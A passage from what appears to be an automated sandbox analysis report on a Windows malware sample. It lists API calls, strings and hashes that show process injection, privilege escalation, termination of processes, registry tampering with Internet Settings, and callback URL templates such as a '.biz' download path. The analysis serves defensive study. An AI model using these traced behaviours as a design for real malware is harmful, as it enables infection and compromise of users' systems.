                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C1187B2904300B7E700AA61AD46F2777ACBB8470DF11083EFD45B51D2F279DA288767
                                                                                                                                                                                                              Function 00401379 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51processfilesynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00401393
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013AF
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013C9
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?), ref: 004013D9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004013ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 004013FC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00401405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
                                                                                                                                                                                                              • String ID: --k33p
                                                                                                                                                                                                              • API String ID: 881816827-1573217081
                                                                                                                                                                                                              • Opcode ID: 5c9f2ae24bbf38b8e4d1a78f3c05765d0a18033d6e5426841d8ad069630d6b3d
                                                                                                                                                                                                              • Instruction ID: 3f95ffb7ecc753adf67741720bf5132c3bbf7ea7650a4e902ed5c82167082f99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c9f2ae24bbf38b8e4d1a78f3c05765d0a18033d6e5426841d8ad069630d6b3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01813180420476D6213A36AC07F0F7FA89B4576CF210A3DF959351EAE67D663D42AF
                                                                                                                                                                                                              Function 004024CE Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 123stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$lstrcpylstrlen
                                                                                                                                                                                                              • String ID: %02X$http://%s.biz/d/G?$p!A
                                                                                                                                                                                                              • API String ID: 1876335253-3368850760
                                                                                                                                                                                                              • Opcode ID: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                                                              • Instruction ID: 2cea46374afef77fdc915a1e9f7db235c3865f046913e12eac0c1d1ce8585de9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F410331C002189BDB11EF68CD8979EBBF5BF40308F150176E815BB2D2D3B9A919C799
                                                                                                                                                                                                              Function 00401D76 Relevance: 12.1, APIs: 8, Instructions: 94networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401D9F
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00401DB3
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401DC9
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401DDB
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00401DF8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ioctlsocket$ErrorLastconnect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1886816560-0
                                                                                                                                                                                                              • Opcode ID: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                                                              • Instruction ID: 443f35bcad443bf4521d197b8b602cf4c8bc99f5fac3635e2f32846607df0921
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E53191B15042005AE230AA65DD45FDF76EC9B8531CF00073EF999A62D1E678A62982EB
                                                                                                                                                                                                              Function 00401912 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00405EB0), ref: 0040193D
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00401953
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040197D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000300,?,?,?,?,?,00020019,?,?,?,00405EB0), ref: 0040198D
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?), ref: 0040199A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteEnumOpenwsprintf
                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                              • API String ID: 4202809218-4073750446
                                                                                                                                                                                                              • Opcode ID: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                                                              • Instruction ID: 17f0bcb135b28bc178a216f8b2dfa9435dc5451e8c8b02a629b5be3cc13ba035
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C601ACB2A042047BE52075266D03F9B76ECCBC574CF11007AF909B61D1E5799F2981BF
                                                                                                                                                                                                              Function 00401EC9 Relevance: 7.6, APIs: 5, Instructions: 113networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00401F45
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,?,00000002), ref: 00401F5E
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,00000001,00000000), ref: 00401F7E
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,-00000001,00000000), ref: 00401FB4
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,00000000,00000000), ref: 00401FC6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$select
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 873784944-0
                                                                                                                                                                                                              • Opcode ID: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                                                              • Instruction ID: c66e6617afff8c9d9109827ab4c11b99613a78ce40c43f432ca9f356368ad492
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A31097040C3429BD731DE14C984B6BBAD8EB81358F24453FF589A62D1E3BD8445D7A7
                                                                                                                                                                                                              Function 0040350B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24registrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003), ref: 00403526
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,?,00000012), ref: 00403543
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,00000012), ref: 00403550
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$Sleep
                                                                                                                                                                                                              • String ID: Default Flags
                                                                                                                                                                                                              • API String ID: 3593280086-1793642065
                                                                                                                                                                                                              • Opcode ID: a5b68f8c3ddcba11c1e75a3cc52f21bfd238a8e0f43b38b7b4c9a5446ecc60c5
                                                                                                                                                                                                              • Instruction ID: c183a8bf8b1eb437f9bd20ceed0a90573d3401291b8ece137b7e57e0eade4e67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5b68f8c3ddcba11c1e75a3cc52f21bfd238a8e0f43b38b7b4c9a5446ecc60c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E04F71A8030472D7712639AE4BF477A3467A1B09F11007BB906398C7A5B51329D9AA
                                                                                                                                                                                                              Function 00402471 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004024A3
                                                                                                                                                                                                                • Part of subcall function 00402030: lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                                                                • Part of subcall function 00402030: lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                                                                • Part of subcall function 00402030: htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                                                                • Part of subcall function 00402030: socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                                                                • Part of subcall function 00402030: closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 0040229C
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetSetOptionA.WININET(00000000,00000002,00009C40,00000004), ref: 004022BF
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetSetOptionA.WININET(00000000,00000006,00009C40,00000004), ref: 004022CB
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetSetOptionA.WININET(00000000,00000005,00009C40,00000004), ref: 004022D7
                                                                                                                                                                                                                • Part of subcall function 00401D38: InternetCloseHandle.WININET(?), ref: 00401D49
                                                                                                                                                                                                                • Part of subcall function 00401D38: InternetCloseHandle.WININET(00000000), ref: 00401D51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Option$CloseHandle$Openclosesockethtonslstrcpylstrlensocketwsprintf
                                                                                                                                                                                                              • String ID: 12@$http://%s/d/rpt?%s$urlinj_creat
                                                                                                                                                                                                              • API String ID: 2941392982-2858504077
                                                                                                                                                                                                              • Opcode ID: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                                                              • Instruction ID: 88ec9d7906897b8114724b1b79faff9a7f04a0d329b8cb3f5de5d04a505f717c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECE06DB160525017E310B669AC86BDB268C9B44388F50453EBB49B32C6E9BDAC4086AA

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00403A19 Relevance: 605.0, APIs: 287, Strings: 57, Instructions: 2982registrystringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00403A27
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(004120D0), ref: 00403A43
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00403A74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407014), ref: 00403AA2
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403ACC
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00000104), ref: 00403AD4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403AF2
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00403B09
                                                                                                                                                                                                              • Process32First.KERNEL32(?,?), ref: 00403B32
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00403B6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 00403B7B
                                                                                                                                                                                                              • Process32Next.KERNEL32(?,?), ref: 00403B94
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403BAC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000FF), ref: 00403BB5
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403BC2
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403BE9
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00403BF6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateRemoteThread), ref: 00403C23
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,00000104), ref: 00403C86
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtAllocateVirtualMemory), ref: 00403C96
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtWriteVirtualMemory), ref: 00403CA6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00403CB6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 00403CC6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,?,?,?,?,00000000,NtAllocateVirtualMemory), ref: 00403CE7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 00403D13
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQueryInformationToken), ref: 00403D2E
                                                                                                                                                                                                              • NtQueryInformationToken.NTDLL(?,00000002,00000000,00002000,?), ref: 00403D82
                                                                                                                                                                                                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00002000,?), ref: 00403DEC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00403E2B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004070C4), ref: 00403E50
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000104), ref: 00403E7F
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000002,?), ref: 00403E97
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403E9F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00000104), ref: 00403EA6
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00403EAD
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(rasapi32.dll,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00403EDA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RasEnumConnectionsA), ref: 00403F01
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00403F34
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetIpAddrTable), ref: 00403F5B
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(wininet.dll), ref: 00403FD9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 00404042
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00404052
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 00404062
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetSetOptionA), ref: 00404072
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 00404082
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404347
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000), ref: 00404366
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404386
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404392
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,007596F8), ref: 0040445F
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004044BC
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(0040F4FC,00000001,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044D0
                                                                                                                                                                                                              • GetLastError.KERNEL32(qnd_b__-13,?,?,?,?,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044E4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404506
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404532
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040453E
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040456E
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0040458C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,007596F8), ref: 004045C1
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100201,00000000,?), ref: 004045DE
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 00404603
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404613
                                                                                                                                                                                                              • SetPriorityClass.KERNEL32(?,00000040), ref: 00404633
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00404658
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(007596F9,00001388), ref: 0040468F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(007596F9,00001388), ref: 00404698
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 004046BC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000080), ref: 004046C5
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 004046F4
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040472B
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000), ref: 00404766
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00404790
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004047A1
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy), ref: 004047BA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040F4FC,?,00000000), ref: 004047CC
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 004047E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404804
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 0040484E
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040487A
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Extended Flags,00000000,00000000,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048B1
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Extended Flags,00000000,00000003,004120C4,0000000C,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004048D7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048E9
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%ComSpec%,?,00000104,?,?,?,?,?,?,?,004120C4,?,?,?,0040F4FC,?), ref: 00404906
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404925
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404954
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404963
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00404998
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000100,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 004049A9
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007596F8,?,00411030,?,00000100,?,?,00000104), ref: 004049B0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049E6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007596F8,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049ED
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049FC
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A2B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007596F8,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A32
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A48
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404A8F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AA9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC9
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404AF2
